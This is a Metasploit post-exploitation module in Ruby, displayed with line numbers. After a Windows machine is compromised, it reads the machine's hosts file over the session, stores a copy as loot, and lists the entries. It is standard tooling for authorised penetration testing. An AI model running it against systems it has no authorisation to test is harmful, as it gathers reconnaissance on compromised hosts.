Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Windows Host File Enumeration',
14
        'Description' => %q{
15
          This module returns a list of entries in the target system's hosts file.
16
        },
17
        'License' => BSD_LICENSE,
18
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => [ 'meterpreter', 'shell' ]
21
      )
22
    )
23
  end
24

25
  def run
26
    # read in the hosts in the hosts file.
27
    hosts = read_file 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts'
28

29
    # Store the original hosts file
30
    p = store_loot(
31
      'hosts.confige',
32
      'text/plain',
33
      session,
34
      hosts,
35
      'hosts_file.txt',
36
      'Windows Hosts File'
37
    )
38

39
    # Print out each line that doesn't start w/ a comment
40
    entries = []
41
    hosts.each_line do |line|
42
      next if line =~ /^[\r|\n|#]/
43

44
      entries << line.strip
45
    end
46

47
    # Show results
48
    if !entries.empty?
49
      print_line('Found entries:')
50
      entries.each do |e|
51
        print_good(e.to_s)
52
      end
53
    end
54

55
    print_status("Hosts file saved: #{p}")
56
  end
57
end
58

59